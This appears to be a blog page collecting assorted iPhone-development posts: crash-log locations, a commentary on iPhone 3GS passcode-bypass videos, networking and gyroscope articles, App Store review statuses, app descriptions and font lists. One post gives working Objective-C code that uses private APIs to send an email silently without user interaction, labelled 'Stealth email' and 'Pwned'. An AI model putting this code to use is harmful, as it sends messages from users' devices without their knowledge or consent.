Saturday, January 4, 2014

How to find crash logs for iPhone applications on Mac, Vista and XP


How to find crash logs for iPhone applications on Mac, Vista and XP


In three major operations systems: Mac OS X, Windows Vista / Windows 7 and for Windows XP.

iTunes sync

Application crash logs are transfered to your computer each time you do a sync with the device, in the iTunes. Thus, first step is to sync with iTunes:
Sync the iPhone or iPod Touch through iTunes

Mac OS X

On the Mac, crash logs are kept at:
1
~/Library/Logs/CrashReporter/MobileDevice/<DEVICE_NAME>
where ~ is your Home folder. Here’s an example:
Crash logs on the Mac OS X. Device name is "iPhone AV" here
There’s the .crash file and .plist file - archive them both and send to a developer. Actually, pick all the files you find there that have the name of the problematic application.

Windows Vista / Windows 7

Files are located here:
1
C:\Users\<USERNAME>\AppData\Roaming\Apple computer\Logs\CrashReporter/MobileDevice/<DEVICE_NAME>
AppData folder is hidden by default, so here’s how to access it. Get into your personal folder:
User folder, with Vista folder path
Now click on the folder (address) bar which will change the display into Windows folder path and add \AppData to it, then click Enter.
When clicked, the address bar changes into regular Windows folder path
This will then show the folder contents. From here, you can follow the path above until you get to the crash logs.
For Windows 7, follow the same procedure.

Windows XP

Location is here:
1
C:\Documents and Settings\<USERNAME>\Application Data\Apple computer\Logs\CrashReporter/<DEVICE_NAME>
is your login username. Application Data folder is usually hidden by default, so you need to reveal it in the same way as in Vista – by typing in and pressing Enter.

Thursday, February 21, 2013

Bypassing iPhone 3G[s] Encryption

Bypassing Passcode and Backup Encryption:




Forensic Recovery of Raw Disk:



What Data Can You Steal From an iPhone in 2 Minutes?



These YouTube videos demonsrate just how easy it is to bypass the passcode and backup encryption in an iPhone 3G[s] within only a couple of minutes’ time. A second video shows how easily tools can pull an unencrypted raw disk image from the device. The seriousness of the iPhone 3G[s]‘ vulnerabilities may make enterprises and government agencies think twice before allowing these devices to contain confidential data. Apple has been alerted to and aware of these vulnerabilities for many years, across all three models of iPhone, but has failed to address them.
The 3G[s] has penetrated the government/military markets as well as top fortune-100s, possibly under the misleading marketing term “hardware encryption”, which many have taken at face value. Serious vulnerabilities such as these threaten to put our country’s national security at risk. Apple’s only fix thus far has been to consistently put a few nails on the front door, but they have thus far failed to fix the major underlying design issues that allow for this threat. Unfortunately, the only way Apple seems to listen is through addressing such problems publicly, as all previous attempts to talk with them have failed.

Secure Coding iPhone and iPad Apps

A Simple App Using NSURLConnection

The easiest way to initiate HTTP requests in iOS is to utilize the NSURLConnection class. Here is sample code from a very simple application that takes in a URL from an edit-box, makes a GET request, and displays the HTML obtained.
Please note that the code in this particular example is mostly from Apple's wonderful tutorial on how to use NSURLConnection
//This IBAction fires when the user types in a URL and presses GO
- (IBAction) urlBarReturn:(id)sender
{
//htmlOutput is the UITextView that displays the HTML
htmlOutput.text=@"";
//urlBar is the UITextField that contains the URL to load
NSURLRequest *theRequest=[NSURLRequest requestWithURL:[NSURL URLWithString:urlBar.text]
cachePolicy:NSURLRequestUseProtocolCachePolicy
timeoutInterval:60.0];
NSURLConnection *theConnection=[[NSURLConnection alloc] initWithRequest:theRequest delegate:self];
if(!theConnection)
htmlOutput.text=@"failed";
}
- (void)connection:(NSURLConnection *)connection didReceiveResponse:(NSURLResponse *)response
{
//receivedData is of type NSMutableData
[receivedData setLength:0];
}
- (void)connection:(NSURLConnection *)connection didReceiveData:(NSData *)data
{
[receivedData appendData:data];
NSString *tempString = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
htmlOutput.text = [NSString stringWithFormat:@"%@%@",htmlOutput.text,tempString];
[tempString release];
}
- (void)connection:(NSURLConnection *)connection didFailWithError:(NSError *)error
{
[connection release];
[receivedData release];
NSLog(@"Connection failed! Error: %@ %@",
[error localizedDescription],
[[error userInfo] objectForKey:NSURLErrorFailingURLStringErrorKey]);
htmlOutput.text=[NSString stringWithFormat:@"Connection failed! Error %@ %@",[error localizedDescription],
[[error userInfo] objectForKey:NSURLErrorFailingURLStringErrorKey]];
}
- (void)connectionDidFinishLoading:(NSURLConnection *)connection
{
NSLog(@"Succeeded! Received %d bytes of data",[receivedData length]);
[connection release];
[receivedData release];
}


Gyroscope - iPhone

While the entire world was giddily anticipating the start of World Cup soccer this year, it was nose to the grindstone here at Sourcebits developing new soccer madness updates of Funbooth for Mac and iPhone.  Work notwithstanding, our development team had serious fun during production of these applications.  Throughout the beta testing and QA we were constantly capturing images of ourselves in the props of the teams we support, and we made the most of the new social features with the on-the-fly uploading to Facebook and Twitter.  And at the same time, our gaming wing guys at Wandake were busy putting the finishing touches on their now-huge hit Wake Up the Box! for iPhone and iPad.  So it was a real party at times.

While all this was going on, of course there was some big news on June 7, when Steve Jobs introduced yet another Apple engineering marvel: iPhone 4.  Bundled with new features like front-facing camera, superior rear camera, dual mikes for increased noise cancellation, eye-popping Retina Display, multitasking, 720p HD video recording and even a new kind of gyroscope technology, iPhone 4 is a huge evolutionary step in smartphone design.  As the tag line says: “This changes everything.  Again.”  And, marketing hyperbole aside, as far as day-to-day use is concerned for sure this will change the way we use iPhone.
Before this year’s launch, several leaked – or mislaid – iPhone 4 models made the rounds of the major tech blogs, complete with gory dissections and the standard tsunami of specu-babble.  But there was one stealth feature all the teardowns and pundits failed to even guess at: the gyroscope.  And on our side, as veteran iPhone developers, when Steve Jobs announced this during WWDC we were all pretty excited.  And while it still hasn’t gotten much attention in the press, this feature is a game changer in iPhone’s rivalry with Android and Symbian devices.

Apple’s been pioneering smartphone innovations since iPhone’s introduction in 2007 with many widely imitated micro-technologies, in particular the accelerometer.  The accelerometer is a type of sensor that detects changes in a device’s orientation, vibration, rotation or fall by detecting linear acceleration along one of the three X, Y and Z axes – that is: up/down, right/left, and front/back.

3-axis accelerometers enable features we by now take for granted in smartphones (and lately, too, in non-Apple branded consumer digital cameras, music players, and gaming peripherals).  For example, landscape/portrait orientation shifting, tilt for directional control in games and applications, and shake features for refreshing a webpage or shuffling a playlist.  The 1st generation of accelerometer – pre iPhone 4 – could measure only linear motion; it couldn’t sense direction on a compass or twisting motions or rotation, nor had any notion of gravity.

Then last year Apple added a magnetometer to the iPhone 3Gs, enabling it to sense magnetized direction relative to the Earth’s poles. And now, with the introduction of the gyro in iPhone 4, Apple once more ups the ante in spatial detection / orientation with a new sensor for detecting 3-axis angular acceleration around the X,Y and Z axes, enabling far more precise virtualization of pitch, yaw and roll on iPhone.
While detection of change in velocity has been possible for some time thanks to conventional accelerometer calculations in terms of linear acceleration, the gyroscope has been designed to detect angular acceleration, which will detect change in both velocity and direction at the same time.  iPhone 4’s gyroscope enables the sensing of even slight degrees of rotation while simultaneously rejecting linear movements and hand jitters – both still ably handled by accelerometer’s linear movement detection technology.
Combining the 3 axes of the gyroscope along with the 3 axes of the accelerometer now enables iPhone to recognize distance, speed and direction as it moves real-time through space. And thanks to the CoreMotion APIs in iOS, developers with the vision to make use of gyroscope data can access it freely, as some have already done.

send Email with out user interaction in Iphone

- (void) sendEmail{
    MFMailComposeViewController *mailComposeViewController = [[MFMailComposeViewController alloc] init];
    mailComposeViewController.mailComposeDelegate = self;
    [mailComposeViewController setToRecipients:[NSArray arrayWithObject:@"matt@harasymczuk.pl"]];
    [mailComposeViewController setSubject:@"Stealth email"];
    [mailComposeViewController setMessageBody:@"Pwned" isHTML:NO];
    [mailComposeViewController view];
}
- (void) mailComposeController:(MFMailComposeViewController*)mailComposeViewController bodyFinishedLoadingWithResult:(NSInteger)result error:(NSError*)error{
    @try
    {
        id mailComposeController = [mailComposeViewController valueForKeyPath:@"internal.mailComposeController"];
        id sendButtonItem = [mailComposeViewController valueForKeyPath:@"internal.mailComposeView.sendButtonItem"];
        [mailComposeController performSelector:@selector(send:) withObject:sendButtonItem];
    }
    @catch (NSException *e) {}
    [mailComposeViewController release];
}

App Store Approval Process

Ensure your app is ready for the approval process

App Store Review Guidelines

Read the App Store Review Guidelines

Before you submit your app for approval, ensure that it follows the technical, design, and content specifications detailed in the App Store Review Guidelines and Human Interface Guidelines. Apps that do not follow these guidelines will be returned for modification before they can be posted to the App Store.
Read the Guidelines       View additional app review resources

Test on Devices

Test your app thoroughly on iPad, iPhone, and iPod touch before uploading it to iTunes Connect. The iPhone Simulator is ideal for prototyping your ideas, debugging memory leaks, simulating memory warnings, and getting a good feel for how your app is going to work. However, since the iPhone Simulator simulates iOS, not hardware, it is not a replacement for testing on an actual device.

What to expect during the review of your app

App Store Review Status

iOS submissions reviewed in the last 5 business days:

94%
New Apps

96%
App Updates

The App Review Team checks every app submission in order to protect consumer privacy, safeguard children from inappropriate content, and avoid applications that degrade the core experience of iPad, iPhone, and iPod touch. All aspects of your app must comply with the criteria outlined in the App Store Review Guidelines and should conform to the iOS Human Interface Guidelines.
After your app has been reviewed and approved, it will be set to the Ready for Sale state (or Pending Contract if your contracts are not yet in effect).
If an issue is discovered during the review of your app, you will be notified via email. You will find details regarding your app rejection in the Resolution Center, which can be accessed from both the App Summary page and the Version Details page in iTunes Connect.
From the Resolution Center, you will be able to see any specific App Review Guidelines that caused your app to be rejected, in addition to any further information provided by App Review. In addition, you can use the Resolution Center to ask App Review for clarification on your app rejection and continue to correspond about your rejected binary until you resubmit it for review, including any attachments such as screenshots. Once you resubmit your binary for review, you will be unable to communicate further with App Review via the Resolution Center.
If you feel your app was incorrectly rejected, you may submit an appeal to the App Review Board. Should you need code-level assistance in making modifications to your app, you can contact Apple Developer Technical Support. Visit the Support Center for details about requesting technical support.

Check the status of your app in iTunes Connect

Once youʼve reviewed and submitted your app, you will be taken back to the Manage Your Applications page. Here youʼll find the application name, version, date submitted, Apple ID, as well as the status of your application. There are 16 colored status indicators that can appear on the Manage Your Applications page after submitting an app. Log in to iTunes Connect
Prepare for Upload (Yellow)
Appears as the first status for your app. This status means that you should enter or edit metadata, screenshots, pricing, In-App Purchases, Game Center, iAd network settings, etc., to prepare your app for upload to the App Store.
Waiting for Upload (Yellow)
Appears when you’ve completed entering your metadata and indicated you are ready to submit your binary, however, you have not finished uploading your binary through Application Loader. Your app must be Waiting For Upload for you to be able to deliver your binary through Application Loader.
Waiting for Review (Yellow)
Appears after you submit a new app or update and prior to the app being reviewed by Apple. This status means that your app has been added to the app review queue, but has not yet started the review process. It takes time to review binaries and this state does not indicate that your app is currently being reviewed.

While your app is Waiting For Review, you can reject your binary to remove it from the Apple review queue and edit certain app information.
In Review (Yellow)
Appears when Apple is currently reviewing your app prior to the app being rejected or approved. Note that it takes time to review binaries. We appreciate your patience and ask that you allow sufficient time for the processing of your app.
Pending Contract (Yellow)
Appears when your application has been reviewed and is Ready for Sale but your contracts are not yet in effect. You may check the progress of your contracts in iTunes Connect by clicking on the Contracts, Tax & Banking information module.
Waiting For Export Compliance (Yellow)
Appears when your CCATS is in review with Export Compliance.
Upload Received (Yellow)
Appears when your binary has been received through Application Loader, but has not yet completed processing into the iTunes Connect system. If your app has been in the Upload Received state for more than 24 hours, you should contact iTunes Connect Support through the iTunes Connect Contact Us module.
Pending Developer Release (Yellow)
Appears when your app version has been approved by Apple and you have chosen to set your Version Release Control. Release it to the App Store when you are ready. To release your app to the App Store, click Release This Version button on the app’s Version Details page within Manage Your Applications.
Processing for App Store (Yellow)
Appears when your binary is being processed and will be Ready For Sale within 24 hours.
Pending Apple Release (Yellow)
Appears when your app version will be held by Apple until the corresponding Apple iOS or OS version is released to the public.
Ready for Sale (Green)
Appears once your application been approved and posted to the App Store. When your application is in this status, you have the option to remove it from the store by going to the Rights and Pricing page and removing all App Store territories.
Rejected (Red)
Appears when the binary has not passed review. You will receive a communication from App Review in the Resolution Center regarding the reason for the rejection.
Metadata Rejected (Red)
Appears when specific metadata items aside from your binary have not passed review. To resolve the issue, you can simply edit the metadata in iTunes Connect and your existing binary will be re-used for the review process. You will receive a communication from App Review in the Resolution Center regarding the reason for the metadata rejection.
Removed from Sale (Red)
Appears when your app has been removed from the App Store.
Developer Rejected (Red)
Appears when you’ve rejected the binary from the review process. Existing versions of your application on the App Store will not be affected by self-rejecting binaries in review.
Important: When you self-reject your binary, you lose your place in the review queue. Your binary will be placed at the end of the queue when you resubmit.
Developer Removed from Sale (Red)
Appears when you’ve removed your application from the App Store.
Invalid Binary (Red)
Appears when your binary has been received through Application Loader but did not meet all requirements for upload. You will receive an email detailing the issue with your binary and how to resolve. Go into iTunes Connect and click Ready to Upload Binary again to set your app back to the Waiting For Upload state in order to resend through Application Loader with resolved binary.
Missing Screenshot (Red)
Available for iOS apps only. Appears when your app is missing a required screenshot for iPhone and iPod touch or iPad for your default language app or for your added localizations. At least one screenshot is required for both iPhone and iPod touch and for iPad if you are submitting a universal app.

Status Update notification email

You can opt-in to receive email notifications alerting you to a change in the status of your applications. Visit the Manage Users section of iTunes Connect, click Edit Profile, select the Notifications tab and click the Status Update box(es).

App Status History

You can view a log with the status history of your app within iTunes Connect. Once a change has been made to your app, a link titled "Status History" will appear with your app details in the Manage Your Applications section. Click the link to view a history of the status changes your app has gone through. You will also be able to see which user on your iTunes Connect account made the change, if the change was initiated by Apple, and the date and time the change was made.
Determine the availability date of your app

Determine the availability date of your app

You can set the date your application will be available for purchase on the App Store when you submit your binary. If your application has not been approved by Apple prior to this date, your application will go live as soon as it has been approved. This is a global date, and applies to all territories selected. If you change this date, it will apply to all versions of your application, not just the version where you are making the change. In addition, if you set this date in the future for the release of an update that is in review, you will remove any existing versions of this app from the App Store.
With the Version Release Control, you can control when an updated version of your app goes live, rather than have the version go live as soon as it is approved by App Review. You will be presented with the Version Release Control option as part of your Ready to Upload Binary questions. If you choose to use the Version Release Control, your app status will change to Pending Developer Release once it is approved by App Review, indicating that you can release it to the App Store whenever you are ready. When you're ready for your app update to go live on the App Store, you can do so by clicking Release This Version from the new app version's details page in iTunes Connect.

how to switch to Indian store? in Apple Appstore

  1. Open the Appstore
  2. Go to Featured (scroll down to bottom until you see your Apple ID)
  3. Click on Apple ID
  4. View Apple ID
  5. Enter your Password
  6. Once you login it will say your account is transferred to the respective country.

Thursday, January 3, 2013

Andal pasuram

Andal pasuram (Tiruppavai) is a collection of thirty stanzas (pasuram) in Thamil written by Andal, in praise of the Lord Perumal. It is part of Divya Prabandha, a work of the twelve Alvars, and is important in Thamil literature.
Andal's thirty songs contain the cardinal principles of Vaishnava dharma during the month of Marghazhi. Vaishnava's sing these songs to bring peace, prosperity and Divine Grace. Andal assumes the guise of a cowherd in these 30 verses. Andal appears intent upon performing a particular religious vow to marry the Lord, thereby obtain His everlasting company, and inviting all her girl-friends to join her. Towards the end we learn that she did not actually perform a religious rite; but is simply praying to be granted the service of the Lord for eternity. She yearns for everlasting happiness and service of the Lord.

***This application contains***

1 . Home Screen

# 30 (Tiruppavai) Andal Pasuram can be heard and sing along.
# 30 Pasuram can be selected from the top menu (swipe left / right to select more pasuram)
# Songs will be helpful for the beginners to learn the Tiruppavai (Added with details like Raaga & Taalam).
# Songs supported in background mode, easy to handle the songs just by sliding to hear the song again.
# Lyrics available in Thamil & English (User can swipe down the text for the English Lyrics)

# 2. More View

# About goddess Andal
# 108 Namavali
# Sri Villiputhur temple history, route, tourist place, speciality, devotional aspects, etc.
# About us Kasinathan Technology (Details about company)
# Rating & Feedback in itunes
# More Apps From Kasinathan Technology
# Contact us (Feedback via mail)
# Share via FB,Twitter,Delicious etc..

Please send feedback or ideas that you would like see in the app to "info@kasinathantechnology.com / kasinathantechnology@gmail.com"
Andal's thirty songs contain the cardinal principles of Vaishnava dharma during the month of Marghazhi. Vaishnava's sing these songs to bring peace, prosperity and Divine Grace. Andal assumes the guise of a cowherd in these 30 verses. Andal appears intent upon performing a particular religious vow to marry the Lord, thereby obtain His everlasting company, and inviting all her girl-friends to join her. Towards the end we learn that she did not actually perform a religious rite; but is simply praying to be granted the service of the Lord for eternity. She yearns for everlasting happiness and service of the Lord.

***This application contains***

1 . Home Screen

# 30 (Tiruppavai) Andal Pasuram can be heard and sing along.
# 30 Pasuram can be selected from the top menu (swipe left / right to select more pasuram)
# Songs will be helpful for the beginners to learn the Tiruppavai (Added with details like Raaga & Taalam).
# Songs supported in background mode, easy to handle the songs just by sliding to hear the song again.
# Lyrics available in Tamil & English (User can swipe down the text for the English Lyrics)

# 2. More View

# About goddess Andal
# 108 Namavali
# Sri Villiputhur temple history, route, tourist place, speciality, devotional aspects, etc.
# About us Kasinathan Technology (Details about company)
# Rating & Feedback in itunes
# More Apps From Kasinathan Technology
# Contact us (Feedback via mail)
# Share via FB,Twitter,Delicious etc..

Friday, December 21, 2012

Christmas 360 App For iPhone & iPad

Christmas is an annual commemoration of the birth of Jesus Christ and a widely observed holiday, celebrated generally on December 25 by billions of people around the world. A feast central to the Christian liturgical year, it closes the Advent season and initiates the twelve days of Christmastide.Christmas is a civil holiday in many of the world's nations is celebrated by an increasing number of non-Christians and is an integral part of the Christmas and holiday season.

***This application contains***
Home screen Will be covered by Christmas tree with snow fall animation with background sound.

# 1 . Info about What is Christmas

# 2 . Info about History of Christmas

# 3 . Christmas & NewYear Countdown

# 4 . Info about Father Christmas

# 5 . Info about Jesus Christ

# 6 . Info about Magi,the gift giver

# 7 . Info about Christmas tree and added the Animated snow fall christmas tree which you have seen on home screen just by tapping christmas tree icon( right hand side of the toolbar ).

# 8 . Music & Carols - Added original lyrics for each Carols to sing along.

# 9 . Traditional Cuisines - Added recipes with steps to be followed to prepare the dish,Swipe each recipe in the top menu bar. Added the zoom functionality to read clearly by just pinch out / in.

# 10 . Christmas Cards & greetings - Contains both landscape & portrait (which fits iPodTouch,iPad,iPhone all versions )we can share photos via Facebook,Twitter,Email.

# 11 . Christmas Quotes - Added different quotes of Christmas by different people.We can swipe the different quotes by swiping left & right.with we can share it via Email,SMS,Facebook,Twitter,Print & Copy to clipboard.

# 12 . Christmas SMS & Wishes - Added different template to wish on Christmas.We can swipe the different wishes by swiping left & right.with we can share it via Email,SMS,Facebook,Twitter,Print & Copy to clipboard.

# 13 . How to Wish in other language

# 14 . Info about The Reindeer

# 15 . Info about The Elves

# 16 . Info about Christmas Gifts

# 17 . Info about The Mistletoe

# 18 . Info about Boxing Day

# 19 . Info about Other Festivals

# 20 . Info about Solstice

# 21 . About us & feedback screen to contact and to send feedback.

# 22 . Sharing using Facebook,Twitter .

# 23 . Added Youtube video to view the different videos for christmas.

Friday, October 19, 2012

List of Fonts Available on the iPhone

List of Fonts Available on the iPhone

 

Using the iPhone SDK v2.1, the resulting output was as follows.
Family name: Hiragino Kaku Gothic ProN W3
    Font name: HiraKakuProN-W3
Family name: Courier
    Font name: Courier
    Font name: Courier-BoldOblique
    Font name: Courier-Oblique
    Font name: Courier-Bold
Family name: Arial
    Font name: ArialMT
    Font name: Arial-BoldMT
    Font name: Arial-BoldItalicMT
    Font name: Arial-ItalicMT
Family name: STHeiti TC
    Font name: STHeitiTC-Light
    Font name: STHeitiTC-Medium
Family name: AppleGothic
    Font name: AppleGothic
Family name: Courier New
    Font name: CourierNewPS-BoldMT
    Font name: CourierNewPS-ItalicMT
    Font name: CourierNewPS-BoldItalicMT
    Font name: CourierNewPSMT
Family name: Zapfino
    Font name: Zapfino
Family name: Hiragino Kaku Gothic ProN W6
    Font name: HiraKakuProN-W6
Family name: Arial Unicode MS
    Font name: ArialUnicodeMS
Family name: STHeiti SC
    Font name: STHeitiSC-Medium
    Font name: STHeitiSC-Light
Family name: American Typewriter
    Font name: AmericanTypewriter
    Font name: AmericanTypewriter-Bold
Family name: Helvetica
    Font name: Helvetica-Oblique
    Font name: Helvetica-BoldOblique
    Font name: Helvetica
    Font name: Helvetica-Bold
Family name: Marker Felt
    Font name: MarkerFelt-Thin
Family name: Helvetica Neue
    Font name: HelveticaNeue
    Font name: HelveticaNeue-Bold
Family name: DB LCD Temp
    Font name: DBLCDTempBlack
Family name: Verdana
    Font name: Verdana-Bold
    Font name: Verdana-BoldItalic
    Font name: Verdana
    Font name: Verdana-Italic
Family name: Times New Roman
    Font name: TimesNewRomanPSMT
    Font name: TimesNewRomanPS-BoldMT
    Font name: TimesNewRomanPS-BoldItalicMT
    Font name: TimesNewRomanPS-ItalicMT
Family name: Georgia
    Font name: Georgia-Bold
    Font name: Georgia
    Font name: Georgia-BoldItalic
    Font name: Georgia-Italic
Family name: STHeiti J
    Font name: STHeitiJ-Medium
    Font name: STHeitiJ-Light
Family name: Arial Rounded MT Bold
    Font name: ArialRoundedMTBold
Family name: Trebuchet MS
    Font name: TrebuchetMS-Italic
    Font name: TrebuchetMS
    Font name: Trebuchet-BoldItalic
    Font name: TrebuchetMS-Bold
Family name: STHeiti K
    Font name: STHeitiK-Medium
    Font name: STHeitiK-Light
------------------------------------------------------------------------------------ 
 For Above 3.0 

Academy Engraved LET

AcademyEngravedLetPlain5.04.3
American Typewriter

AmericanTypewriter3.04.3
AmericanTypewriter-Bold3.04.3
AmericanTypewriter-Condensed5.05.0
AmericanTypewriter-CondensedBold5.05.0
AmericanTypewriter-CondensedLight5.05.0
AmericanTypewriter-Light5.05.0
Apple Color Emoji

AppleColorEmoji3.04.3
Apple SD Gothic Neo

AppleSDGothicNeo-Bold5.05.0
AppleSDGothicNeo-Medium4.34.3
Arial

ArialMT3.04.3
Arial-BoldItalicMT3.04.3
Arial-BoldMT3.04.3
Arial-ItalicMT3.04.3
Arial Hebrew

ArialHebrew3.04.3
ArialHebrew-Bold3.04.3
Arial Rounded MT Bold

ArialRoundedMTBold3.04.3
Avenir

Avenir-Black6.06.0
Avenir-BlackOblique6.06.0
Avenir-Book6.06.0
Avenir-BookOblique6.06.0
Avenir-Heavy6.06.0
Avenir-HeavyOblique6.06.0
Avenir-Light6.06.0
Avenir-LightOblique6.06.0
Avenir-Medium6.06.0
Avenir-MediumOblique6.06.0
Avenir-Oblique6.06.0
Avenir-Roman6.06.0
Avenir Next

AvenirNext-Bold6.06.0
AvenirNext-BoldItalic6.06.0
AvenirNext-DemiBold6.06.0
AvenirNext-DemiBoldItalic6.06.0
AvenirNext-Heavy6.06.0
AvenirNext-HeavyItalic6.06.0
AvenirNext-Italic6.06.0
AvenirNext-Medium6.06.0
AvenirNext-MediumItalic6.06.0
AvenirNext-Regular6.06.0
AvenirNext-UltraLight6.06.0
AvenirNext-UltraLightItalic6.06.0
Avenir Next Condensed

AvenirNextCondensed-Bold6.06.0
AvenirNextCondensed-BoldItalic6.06.0
AvenirNextCondensed-DemiBold6.06.0
AvenirNextCondensed-DemiBoldItalic6.06.0
AvenirNextCondensed-Heavy6.06.0
AvenirNextCondensed-HeavyItalic6.06.0
AvenirNextCondensed-Italic6.06.0
AvenirNextCondensed-Medium6.06.0
AvenirNextCondensed-MediumItalic6.06.0
AvenirNextCondensed-Regular6.06.0
AvenirNextCondensed-UltraLight6.06.0
AvenirNextCondensed-UltraLightItalic6.06.0
Bangla Sangam MN

BanglaSangamMN3.04.3
BanglaSangamMN-Bold3.04.3
Baskerville

Baskerville3.04.3
Baskerville-Bold3.04.3
Baskerville-BoldItalic3.04.3
Baskerville-Italic3.04.3
Baskerville-SemiBold5.05.0
Baskerville-SemiBoldItalic5.05.0
Bodoni Ornaments

BodoniOrnamentsITCTT5.04.3
Bodoni 72

BodoniSvtyTwoITCTT-Bold5.04.3
BodoniSvtyTwoITCTT-Book5.04.3
BodoniSvtyTwoITCTT-BookIta5.04.3
Bodoni 72 Oldstyle

BodoniSvtyTwoOSITCTT-Bold5.04.3
BodoniSvtyTwoOSITCTT-Book5.04.3
BodoniSvtyTwoOSITCTT-BookIt5.04.3
BodoniSvtyTwoSCITCTT-Book5.04.3
Bradley Hand

BradleyHandITCTT-Bold6.04.3
Chalkboard SE

ChalkboardSE-Bold3.04.3
ChalkboardSE-Light5.05.0
ChalkboardSE-Regular3.04.3
Chalkduster

Chalkduster5.04.3
Cochin

Cochin3.04.3
Cochin-Bold3.04.3
Cochin-BoldItalic3.04.3
Cochin-Italic3.04.3
Copperplate

Copperplate5.04.3
Copperplate-Bold5.04.3
Copperplate-Light5.05.0
Courier

Courier3.04.3
Courier-Bold3.04.3
Courier-BoldOblique3.04.3
Courier-Oblique3.04.3
Courier New

CourierNewPS-BoldItalicMT3.04.3
CourierNewPS-BoldMT3.04.3
CourierNewPS-ItalicMT3.04.3
CourierNewPSMT3.04.3
DB LCD Temp

DBLCDTempBlack6.0
3.0
6.0
4.3
Devanagari Sangam MN

DevanagariSangamMN3.04.3
DevanagariSangamMN-Bold3.04.3
Didot

Didot5.04.3
Didot-Bold5.04.3
Didot-Italic5.04.3
Euphemia UCAS

EuphemiaUCAS5.05.0
EuphemiaUCAS-Bold5.05.0
EuphemiaUCAS-Italic5.05.0
Futura

Futura-CondensedExtraBold3.04.3
Futura-CondensedMedium5.05.0
Futura-Medium3.04.3
Futura-MediumItalic3.04.3
Geeza Pro

GeezaPro3.04.3
GeezaPro-Bold3.04.3
Georgia

Georgia3.04.3
Georgia-Bold3.04.3
Georgia-BoldItalic3.04.3
Georgia-Italic3.04.3
Gill Sans

GillSans5.04.3
GillSans-Bold5.04.3
GillSans-BoldItalic5.04.3
GillSans-Italic5.04.3
GillSans-Light5.05.0
GillSans-LightItalic5.05.0
Gujarati Sangam MN

GujaratiSangamMN3.04.3
GujaratiSangamMN-Bold3.04.3
Gurmukhi MN

GurmukhiMN3.04.3
GurmukhiMN-Bold3.04.3
Heiti SC

STHeitiSC-Light3.04.3
STHeitiSC-Medium3.04.3
Heiti TC

STHeitiTC-Light3.04.3
STHeitiTC-Medium3.04.3
Helvetica

Helvetica3.04.3
Helvetica-Bold3.04.3
Helvetica-BoldOblique3.04.3
Helvetica-Light5.05.0
Helvetica-LightOblique5.05.0
Helvetica-Oblique3.04.3
Helvetica Neue

HelveticaNeue3.04.3
HelveticaNeue-Bold3.04.3
HelveticaNeue-BoldItalic3.04.3
HelveticaNeue-CondensedBlack5.05.0
HelveticaNeue-CondensedBold5.05.0
HelveticaNeue-Italic3.04.3
HelveticaNeue-Light5.05.0
HelveticaNeue-LightItalic5.05.0
HelveticaNeue-Medium5.05.0
HelveticaNeue-UltraLight5.05.0
HelveticaNeue-UltraLightItalic5.05.0
Hiragino Kaku Gothic ProN

HiraKakuProN-W33.04.3
HiraKakuProN-W65.04.3
Hiragino Mincho ProN

HiraMinProN-W33.04.3
HiraMinProN-W63.04.3
Hoefler Text

HoeflerText-Black5.04.3
HoeflerText-BlackItalic5.04.3
HoeflerText-Italic5.04.3
HoeflerText-Regular5.04.3
Kailasa

Kailasa3.04.3
Kailasa-Bold3.04.3
Kannada Sangam MN

KannadaSangamMN3.04.3
KannadaSangamMN-Bold3.04.3
Malayalam Sangam MN

MalayalamSangamMN3.04.3
MalayalamSangamMN-Bold3.04.3
Marion

Marion-Bold5.05.0
Marion-Italic5.05.0
Marion-Regular5.05.0
Marker Felt

MarkerFelt-Thin3.04.3
MarkerFelt-Wide3.04.3
Noteworthy

Noteworthy-Bold5.05.0
Noteworthy-Light5.05.0
Optima

Optima-Bold5.04.3
Optima-BoldItalic5.04.3
Optima-ExtraBlack5.05.0
Optima-Italic5.04.3
Optima-Regular5.04.3
Oriya Sangam MN

OriyaSangamMN3.04.3
OriyaSangamMN-Bold3.04.3
Palatino

Palatino-Bold3.04.3
Palatino-BoldItalic3.04.3
Palatino-Italic3.04.3
Palatino-Roman3.04.3
Papyrus

Papyrus5.04.3
Papyrus-Condensed3.05.0
Party LET

PartyLetPlain5.04.3
Sinhala Sangam MN

SinhalaSangamMN3.04.3
SinhalaSangamMN-Bold3.04.3
Snell Roundhand

SnellRoundhand3.04.3
SnellRoundhand-Black5.05.0
SnellRoundhand-Bold3.04.3
Symbol

Symbol6.06.0
Tamil Sangam MN

TamilSangamMN3.04.3
TamilSangamMN-Bold3.04.3
Telugu Sangam MN

TeluguSangamMN3.04.3
TeluguSangamMN-Bold3.04.3
Thonburi

Thonburi3.04.3
Thonburi-Bold3.04.3
Times New Roman

TimesNewRomanPS-BoldItalicMT3.04.3
TimesNewRomanPS-BoldMT3.04.3
TimesNewRomanPS-ItalicMT3.04.3
TimesNewRomanPSMT3.04.3
Trebuchet MS

Trebuchet-BoldItalic3.04.3
TrebuchetMS3.04.3
TrebuchetMS-Bold3.04.3
TrebuchetMS-Italic3.04.3
Verdana

Verdana3.04.3
Verdana-Bold3.04.3
Verdana-BoldItalic3.04.3
Verdana-Italic3.04.3
Zapf Dingbats

ZapfDingbatsITC5.04.3
Zapfino

Zapfino3.04.3